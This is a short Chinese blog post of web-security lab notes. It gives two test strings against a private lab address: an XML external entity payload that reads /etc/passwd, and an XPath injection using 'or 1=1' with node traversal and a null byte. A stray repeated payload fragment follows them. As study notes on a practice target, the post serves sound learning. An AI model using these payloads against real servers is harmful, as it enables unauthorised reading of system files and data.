Ex1:

檢測字串:

http://192.168.83.132/xml/example1.php? xml=<!DOCTYPE blah [<!ELEMENT foo ANY><!ENTITY bar SYSTEM “file:///etc/passwd” >]><foo>%26bar;</foo>

Ex2:

檢測字串:

http://192.168.83.132/xml/example2.php?name=hacker%E2%80%99%20or%201=1]/parent::*/child::node()%00

>%26bar;</foo>

 

文章標籤
全站熱搜
創作者介紹
創作者 布拉怡 的頭像
布拉怡

nini的部落格

布拉怡 發表在 痞客邦 留言(0) 人氣(27)